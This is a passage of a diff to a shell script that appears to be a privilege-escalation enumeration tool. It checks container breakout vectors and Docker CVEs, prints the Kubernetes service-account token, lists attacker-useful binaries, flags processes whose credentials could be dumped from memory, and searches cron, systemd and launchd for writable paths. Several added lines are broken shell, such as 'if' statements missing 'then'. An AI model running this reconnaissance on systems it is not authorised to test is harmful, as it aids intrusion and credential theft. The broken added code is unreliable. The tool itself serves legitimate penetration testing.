"$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi +print_list "Any running containers? ........ 
"$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +echo_no +else +containerCounts="" +if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi +if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi +if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi +if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi +echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," +# List any running containers +if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi +if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi +fi - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" - 
checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi +#If docker +if echo "$containerType" | grep -qi "docker"; then +print_2title "Docker Container details" +inDockerGroup +print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Looking and enumerating Docker Sockets\n"$NC +enumerateDockerSockets +print_list "Docker version .................$NC$dockerVersion" +checkDockerVersionExploits +print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ 
$DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," +fi +if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker +fi +fi - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi +if [ "$inContainer" ]; then +echo "" +print_2title "Container & breakout enumeration" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" +print_list "Container ID ...................$NC $(cat /etc/hostname)" +if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" +fi +if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" +fi - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" +checkContainerExploits +print_list "Vulnerable to CVE-2019-5021 .. 
$VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +echo "" - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" +print_2title "Container Capabilities" +capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" +echo "" - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi +print_2title "Privilege Mode" +if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," else - echo_not_found + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," fi - echo "" +else + echo_not_found +fi +echo "" - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" +print_2title "Interesting Files Mounted" +(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" +echo "" - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +print_2title "Possible Entrypoints" +ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq +echo "" fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q available_software; +print_title "Available Software" +########################################### 
+#---------) Available Software (----------# +########################################### -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" +#-- 1AS) Useful software +print_2title "Useful software" +command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +echo "" - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" +#-- 2AS) Search for compilers +print_2title "Installed Compiler" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" - #-- 2D) Unmounted - print_2title "Unmounted file-system?" 
- print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$(command -v pkg 2>/dev/null)" ]; then +print_2title "Vulnerable Packages" +pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" +echo "" fi - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title 
"Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$(command -v brew 2>/dev/null)" ]; then +print_2title "Brew Installed Packages" +brew list +echo "" fi - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} 
"s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! 
[ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." 
| sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! 
[ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! 
[ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi +if [ "$MACPEAS" ]; then +print_2title "Writable Installed Applications" +system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" +done - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! 
[ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" +system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done + +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; +print_title "Processes, Crons, Timers, Services and Sockets" +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then +printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then +print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," +pslist=$(print_ps) +else +(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if 
[ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi +done +pslist=$(ps auxwww) +echo "" + +#-- PCS) Binary processes permissions +print_2title "Binary processes permissions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +binW="IniTialiZZinnggg" +ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi +done +ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! 
[ "$IAMROOT" ]; then +print_2title "Files opened by processes belonging to other users" +print_info "This is usually empty because of the lack of privileges to read other user processes information" +lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! 
